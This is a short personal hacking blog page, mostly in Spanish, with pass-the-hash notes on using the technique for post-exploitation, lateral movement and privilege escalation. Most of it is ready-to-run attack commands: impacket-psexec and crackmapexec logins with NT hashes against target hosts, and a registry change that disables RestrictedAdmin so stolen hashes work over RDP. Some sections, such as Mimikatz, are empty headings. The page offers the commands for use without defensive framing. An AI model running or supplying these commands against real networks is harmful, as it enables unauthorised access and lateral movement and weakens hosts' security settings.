Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

Pass the hash

Pass the ticket

Pass the ticket LINUX

Español:

Definición

Utilización

  1. Post explotación
  2. Movimiento lateral: Para moverse lateralmente dentro de una red si la maquina comprometida tiene acceso a recursos compartidos.
  3. Escalación de privilegios

Funcionamiento

Impacket con psexec

impacket-psexec [email protected] -hashes :30B3783CE2ABF1AF70F77D0660CF3453 DOMAIN/USER@TARGET -hashes LMHASH:NTHASH

Mimikatz

Crackmapexec

crackmapexec smb TARGET_IP -u USER -H NTHASH cme smb 192.168.1.10 -u admin -H 0123456789abcdef0123456789abcdef

Permitir Pth con RDP

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f